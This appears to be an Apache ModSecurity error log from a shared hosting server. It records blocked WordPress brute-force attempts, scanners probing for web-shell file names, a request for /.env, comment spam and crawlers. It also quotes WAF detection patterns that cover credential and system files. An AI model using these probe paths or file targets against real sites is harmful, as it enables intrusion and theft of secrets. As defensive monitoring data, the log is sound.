[Tue May 26 12:48:25.642295 2026] [security2:error] [pid 448967:tid 449123] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJQeXLPuWQsfM-UVSqsQAAABo"]
[Tue May 26 12:48:27.935069 2026] [security2:error] [pid 448967:tid 449198] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJQ-XLPuWQsfM-UVSrBgAAAGU"]
[Tue May 26 12:48:28.250041 2026] [security2:error] [pid 448967:tid 449057] [remote 18.190.7.192:54498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVJROXLPuWQsfM-UVSrGgAAVFk"]
[Tue May 26 12:48:30.031201 2026] [security2:error] [pid 448967:tid 448969] [remote 52.18.195.140:33128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVJReXLPuWQsfM-UVSrXgAARAE"]
[Tue May 26 12:48:30.347929 2026] [security2:error] [pid 448967:tid 449159] [client 4.201.75.230:5945] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/dex.php"] [unique_id "ahVJRuXLPuWQsfM-UVSrawAAAD4"]
[Tue May 26 12:48:30.767020 2026] [security2:error] [pid 448967:tid 449210] [client 157.20.138.61:64414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJRuXLPuWQsfM-UVSreAAAAHE"]
[Tue May 26 12:48:30.767181 2026] [security2:error] [pid 448967:tid 449210] [client 157.20.138.61:64414] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJRuXLPuWQsfM-UVSreAAAAHE"]
[Tue May 26 12:48:30.861051 2026] [security2:error] [pid 448967:tid 449116] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJRuXLPuWQsfM-UVSrbgAAABM"]
[Tue May 26 12:48:31.095026 2026] [security2:error] [pid 448967:tid 449128] [client 74.7.175.131:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "workrepublic.thedebateafrica.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVJR-XLPuWQsfM-UVSrhwAAAB8"]
[Tue May 26 12:48:31.095602 2026] [security2:error] [pid 448967:tid 449160] [client 74.7.175.131:45582] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "workrepublic.thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahVJR-XLPuWQsfM-UVSrhQAAPwo"]
[Tue May 26 12:48:32.114917 2026] [security2:error] [pid 448967:tid 449104] [client 4.201.75.230:5910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVJSOXLPuWQsfM-UVSrngAAAAc"]
[Tue May 26 12:48:33.582909 2026] [autoindex:error] [pid 448967:tid 449183] [client 74.7.243.222:0] AH01276: Cannot serve directory /home2/debatqhn/workrepublic.debatenigeria.org/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 12:48:34.317093 2026] [security2:error] [pid 448967:tid 449113] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJSeXLPuWQsfM-UVSr0gAAABA"]
[Tue May 26 12:48:34.947727 2026] [security2:error] [pid 448967:tid 449108] [client 4.201.75.230:5368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/zwso.php"] [unique_id "ahVJSuXLPuWQsfM-UVSr7AAAAAs"]
[Tue May 26 12:48:35.556971 2026] [security2:error] [pid 448967:tid 449191] [client 176.65.139.232:39866] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.composer.dezka.mx"] [uri "/.env"] [unique_id "ahVJS-XLPuWQsfM-UVSr-gAAAF4"]
[Tue May 26 12:48:37.169706 2026] [security2:error] [pid 448967:tid 449113] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJTOXLPuWQsfM-UVSsFQAAABA"]
[Tue May 26 12:48:38.198162 2026] [security2:error] [pid 448967:tid 449125] [client 4.201.75.230:5332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-admin/zwso.php"] [unique_id "ahVJTuXLPuWQsfM-UVSsPAAAABw"]
[Tue May 26 12:48:39.410446 2026] [security2:error] [pid 448967:tid 449145] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJTuXLPuWQsfM-UVSsUgAAADA"]
[Tue May 26 12:48:41.364292 2026] [security2:error] [pid 448967:tid 449167] [client 4.201.75.230:5316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/shlo.php"] [unique_id "ahVJUeXLPuWQsfM-UVSslQAAAEY"]
[Tue May 26 12:48:41.696693 2026] [security2:error] [pid 448967:tid 449130] [client 157.20.138.61:64772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJUeXLPuWQsfM-UVSsmQAAACE"]
[Tue May 26 12:48:41.696852 2026] [security2:error] [pid 448967:tid 449130] [client 157.20.138.61:64772] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJUeXLPuWQsfM-UVSsmQAAACE"]
[Tue May 26 12:48:42.446916 2026] [security2:error] [pid 448967:tid 449154] [client 4.201.75.230:5670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/133.php"] [unique_id "ahVJUuXLPuWQsfM-UVSsrwAAADk"]
[Tue May 26 12:48:42.812058 2026] [security2:error] [pid 448967:tid 449178] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJUuXLPuWQsfM-UVSsqwAAAFE"]
[Tue May 26 12:48:43.241099 2026] [security2:error] [pid 448967:tid 449092] [remote 172.236.172.195:54668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.172.236.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVJU-XLPuWQsfM-UVSswgAAVXw"]
[Tue May 26 12:48:43.308666 2026] [security2:error] [pid 448967:tid 449106] [client 202.76.174.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJUuXLPuWQsfM-UVSsvAAAAAk"]
[Tue May 26 12:48:44.730380 2026] [security2:error] [pid 448967:tid 449213] [client 4.201.75.230:5693] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/lufix1.php"] [unique_id "ahVJVOXLPuWQsfM-UVSs7gAAAHQ"]
[Tue May 26 12:48:44.972301 2026] [security2:error] [pid 448967:tid 449157] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJVOXLPuWQsfM-UVSs5gAAADw"]
[Tue May 26 12:48:45.798528 2026] [security2:error] [pid 448967:tid 448997] [remote 74.7.241.58:44442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVJVeXLPuWQsfM-UVStDQAAZx0"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/templates/fields
[Tue May 26 12:48:46.357130 2026] [security2:error] [pid 448967:tid 449203] [client 4.201.75.230:5371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/witmm.php"] [unique_id "ahVJVuXLPuWQsfM-UVStGgAAAGo"]
[Tue May 26 12:48:47.069402 2026] [security2:error] [pid 448967:tid 449118] [client 185.191.171.12:38976] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/12/"] [unique_id "ahVJV-XLPuWQsfM-UVStLwAAABU"]
[Tue May 26 12:48:47.069609 2026] [security2:error] [pid 448967:tid 449118] [client 185.191.171.12:38976] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/12/"] [unique_id "ahVJV-XLPuWQsfM-UVStLwAAABU"]
[Tue May 26 12:48:47.920068 2026] [security2:error] [pid 448967:tid 449218] [client 4.201.75.230:5354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wefile.php"] [unique_id "ahVJV-XLPuWQsfM-UVStQgAAAHk"]
[Tue May 26 12:48:48.389475 2026] [security2:error] [pid 448967:tid 449153] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJV-XLPuWQsfM-UVStSwAAADg"]
[Tue May 26 12:48:48.896269 2026] [security2:error] [pid 448967:tid 449121] [client 4.201.75.230:40320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/php2.php"] [unique_id "ahVJWOXLPuWQsfM-UVStWwAAABg"]
[Tue May 26 12:48:49.986781 2026] [security2:error] [pid 448967:tid 449178] [client 4.201.75.230:5660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/xmlss.php"] [unique_id "ahVJWeXLPuWQsfM-UVStfgAAAFE"]
[Tue May 26 12:48:50.559727 2026] [security2:error] [pid 448967:tid 449218] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJWuXLPuWQsfM-UVStgQAAAHk"]
[Tue May 26 12:48:51.251376 2026] [security2:error] [pid 448967:tid 449155] [client 95.142.47.113:53145] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "95.142.47.113" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVJW-XLPuWQsfM-UVStoAAAADo"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 12:48:51.251460 2026] [security2:error] [pid 448967:tid 449155] [client 95.142.47.113:53145] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVJW-XLPuWQsfM-UVStoAAAADo"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 12:48:51.355559 2026] [security2:error] [pid 448967:tid 449217] [client 4.201.75.230:5350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/casp3.php"] [unique_id "ahVJW-XLPuWQsfM-UVStpAAAAHg"]
[Tue May 26 12:48:52.183479 2026] [security2:error] [pid 448967:tid 449118] [client 157.20.138.61:65129] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJXOXLPuWQsfM-UVStwAAAABU"]
[Tue May 26 12:48:52.183573 2026] [security2:error] [pid 448967:tid 449118] [client 157.20.138.61:65129] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJXOXLPuWQsfM-UVStwAAAABU"]
[Tue May 26 12:48:53.449757 2026] [security2:error] [pid 448967:tid 449142] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJXOXLPuWQsfM-UVSt1gAAAC0"]
[Tue May 26 12:48:56.698372 2026] [security2:error] [pid 448967:tid 449188] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJYOXLPuWQsfM-UVSuPQAAAFs"]
[Tue May 26 12:48:57.384154 2026] [security2:error] [pid 448967:tid 449107] [client 202.28.194.139:41787] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "202.28.194.139" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVJYeXLPuWQsfM-UVSuVwAAAAo"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 12:48:57.384279 2026] [security2:error] [pid 448967:tid 449107] [client 202.28.194.139:41787] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVJYeXLPuWQsfM-UVSuVwAAAAo"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 12:48:58.048853 2026] [security2:error] [pid 448967:tid 449025] [remote 103.11.102.106:59436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVJYeXLPuWQsfM-UVSuaAAARDk"]
[Tue May 26 12:48:59.046713 2026] [security2:error] [pid 448967:tid 449167] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJYuXLPuWQsfM-UVSuegAAAEY"]
[Tue May 26 12:49:01.083945 2026] [security2:error] [pid 448967:tid 449125] [client 114.119.152.231:57329] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "preetishah.com"] [uri "/episodes/trailer/"] [unique_id "ahVJZeXLPuWQsfM-UVSutAAAABw"], referer: https://preetishah.com/episodes/trailer/
[Tue May 26 12:49:01.819204 2026] [security2:error] [pid 448967:tid 449221] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJZeXLPuWQsfM-UVSuvQAAAHw"]
[Tue May 26 12:49:02.723047 2026] [security2:error] [pid 448967:tid 449210] [client 157.20.138.61:65482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJZuXLPuWQsfM-UVSu3QAAAHE"]
[Tue May 26 12:49:02.723185 2026] [security2:error] [pid 448967:tid 449210] [client 157.20.138.61:65482] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJZuXLPuWQsfM-UVSu3QAAAHE"]
[Tue May 26 12:49:03.744044 2026] [security2:error] [pid 448967:tid 449208] [client 120.240.178.202:54382] ModSecurity: Access denied with code 406 (phase 2). Match of "rx ((?:submit(?:\\\\+| )?(request)?(?:\\\\+| )?>+|<<(?:\\\\+| )remove|(?:sign ?in|log ?(?:in|out)|next|modifier|envoyer|add|continue|weiter|account|results|select)(?:\\\\+| )?>+)$|^< ?\\\\??(?: |\\\\+)?xml|^<samlp|^>> ?$)" against "ARGS:c" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1093"] [id "350147"] [rev "155"] [msg "Atomicorp.com WAF Rules: Potentially Untrusted Web Content Detected"] [severity "CRITICAL"] [hostname "cagmedya.com"] [uri "/"] [unique_id "ahVJZ-XLPuWQsfM-UVSu9AAAAG8"]
[Tue May 26 12:49:04.611186 2026] [security2:error] [pid 448967:tid 449141] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJaOXLPuWQsfM-UVSvCgAAACw"]
[Tue May 26 12:49:04.984592 2026] [security2:error] [pid 448967:tid 449199] [client 34.91.36.231:49152] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "cpanel.consultrgb.com"] [uri "/"] [unique_id "ahVJaOXLPuWQsfM-UVSvHgAAAGY"]
[Tue May 26 12:49:04.984728 2026] [security2:error] [pid 448967:tid 449199] [client 34.91.36.231:49152] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "cpanel.consultrgb.com"] [uri "/"] [unique_id "ahVJaOXLPuWQsfM-UVSvHgAAAGY"]
[Tue May 26 12:49:08.013471 2026] [security2:error] [pid 448967:tid 449166] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJa-XLPuWQsfM-UVSvZgAAAEU"]
[Tue May 26 12:49:10.293906 2026] [security2:error] [pid 448967:tid 449143] [client 113.190.68.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJbeXLPuWQsfM-UVSvmQAAAC4"]
[Tue May 26 12:49:10.455722 2026] [security2:error] [pid 448967:tid 449129] [client 20.196.127.68:2676] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "cpanel.contabilidadecarioca.com.br"] [uri "/1.php"] [unique_id "ahVJbuXLPuWQsfM-UVSvrQAAACA"]
[Tue May 26 12:49:10.953053 2026] [security2:error] [pid 448967:tid 449100] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJbuXLPuWQsfM-UVSvsAAAAAM"]
[Tue May 26 12:49:11.668391 2026] [security2:error] [pid 448967:tid 449134] [client 167.160.73.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVJb-XLPuWQsfM-UVSv2AAAACU"], referer: https://www.anujtradingco.com/
